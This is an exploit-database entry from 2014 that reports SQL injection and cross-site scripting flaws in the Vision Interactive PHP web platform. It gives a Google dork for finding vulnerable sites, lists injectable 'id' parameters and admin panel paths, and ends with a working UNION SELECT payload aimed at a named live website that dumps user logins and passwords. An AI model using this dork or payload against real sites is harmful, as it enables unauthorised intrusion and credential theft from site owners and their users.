Vision Interactive - SQL Injection / Cross-Site Scripting Vulnerabilities

2014-02-07T00:00:00
ID 1337DAY-ID-21867
Type zdt
Reporter X-Line
Modified 2014-02-07T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Vision Interactive - SQL Injection and Cross-Site Scripting 
# Google Dork: "Powered by Vision Interactive"
# Date: 04/02/2014
# ontact: FB /7h38357
# Exploit Author: X-Line ( Empire North )
# Vendor Homepage: www.visioninteractive.ma
# Software Link: www.visioninteractive.ma
# Tested on: Windows, Linux
 
Vulnerable code infile fiche.php produits.php apeldetail.php *.php
Description: The $_GET-Parameter 'id' is not filtered and so an attacker
             can inject some malicious mysql-code.
 
Example:

    SQL Injection & Cross-Site Scripting

	PoC:
http://localhost/fiche.php?id=[SQL INJECTION] and [Cross-Site Scripting]
http://localhost/produits.php?id=[SQL INJECTION] and [Cross-Site Scripting]
http://localhost/apeldetail.php?id=[SQL INJECTION] and [Cross-Site Scripting]
http://localhost/fiche_actualite.php?id=[SQL INJECTION] and [Cross-Site Scripting]
http://localhost/reservation.php?id=[SQL INJECTION] and [Cross-Site Scripting]


Panel 
/admin
/auth.php

Demo:
http://www.inrh.ma/apeldetail.php?id=-1870 union select 1,2,3,4,5,6,7,group_concat(us_login,0x3a,us_pass),9,10,11,12,13,14 from utilisateurs


#
#
#Greetz to lWalida & Walid & Myself

#  0day.today [2018-01-05]  #